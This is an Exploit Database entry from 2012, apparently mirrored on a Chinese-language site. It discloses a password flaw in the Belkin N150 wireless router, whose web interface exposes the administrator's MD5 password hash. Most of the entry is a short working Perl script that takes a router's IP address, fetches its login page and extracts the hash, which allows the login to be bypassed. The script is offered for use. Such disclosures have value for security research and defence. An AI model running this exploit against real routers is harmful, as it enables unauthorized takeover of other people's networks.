Belkin N150 Wireless Router – Password Disclosure

• Exploit Database
• 14 阅读

• 作者： Avinash Tangirala
  日期： 2012-05-11
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/18859/

• ============================================
  Belkin N150 Wireless MD5 Password Disclosure
  ============================================
  
  
  Firmware Version :1.00.22 (Aug 31 2010 14:36:01)
  Boot Version :1.20 
  Hardware :F7D1301 v1 (01A) 
  Author :Avinash Tangirala
  
  ======================
  Vulnerability Details:
  ======================
  
  The Router's web interface on default 192.168.2.1 reveals the administrator password in MD5 hash thereby one can bypass the login completely.
  There is a similar exploit for Belkin G wireless router by aodrulez. Therefore this exploit might* work possibly on every Belkin router created :D.
  
  =========
  Exploit :
  =========
   
  #/usr/bin/perl
  use strict; 
  use LWP::Simple;
  print "\n'Belkin N150 Wireless Router' Admin Exploit ";
  print "\n ---------------------------------------------\n\n";
  print "[+] Enter the Router's IP Address : ";
  my $ip=<STDIN>;
  chomp($ip);
  $ip=get("http://".$ip."/login.stm") or die "\n[!] check ip and try again \n";
  my @arr=$ip =~ m/var password = "(.*)";/g;
  print "[+] Admin Password = ".@arr[0]." (MD5 Hash).\n";
  
  
  ==========
  Greetz to:
  ==========
  
  1.) Aodrulez:My Mentor 
  2.) Arkz
  3.) neurotoxIN
  4.) www.codeeleven.in